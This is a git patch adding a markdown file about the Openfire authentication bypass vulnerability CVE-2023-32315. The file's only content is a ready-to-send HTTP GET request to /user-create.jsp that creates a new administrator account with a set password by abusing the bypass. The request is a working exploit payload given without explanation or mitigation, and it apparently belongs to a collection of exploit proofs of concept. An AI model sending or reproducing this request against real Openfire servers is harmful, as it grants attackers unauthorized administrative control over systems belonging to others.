From 0731d3918e0ea0a2774f8689dbf956b1f94d2f32 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 19 Aug 2023 20:34:08 +0800 Subject: [PATCH] =?UTF-8?q?Create=20Openfire=E8=BA=AB=E4=BB=BD=E8=AE=A4?= =?UTF-8?q?=E8=AF=81=E7=BB=95=E8=BF=87=E6=BC=8F=E6=B4=9E(CVE-2023-32315).m?= =?UTF-8?q?d?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- Openfire身份认证绕过漏洞(CVE-2023-32315).md | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 Openfire身份认证绕过漏洞(CVE-2023-32315).md diff --git a/Openfire身份认证绕过漏洞(CVE-2023-32315).md b/Openfire身份认证绕过漏洞(CVE-2023-32315).md new file mode 100644 index 0000000..5a3303a --- /dev/null +++ b/Openfire身份认证绕过漏洞(CVE-2023-32315).md @@ -0,0 +1,5 @@ +## Openfire身份认证绕过漏洞(CVE-2023-32315) +``` +GET /user-create.jsp?csrf=Sio3WOA89y2L9Rl&username=user1&name=&email=&password=Qwer1234&passwordConfirm=Qwer1234&isadmin=on&create=............ HTTP/1.1 + +```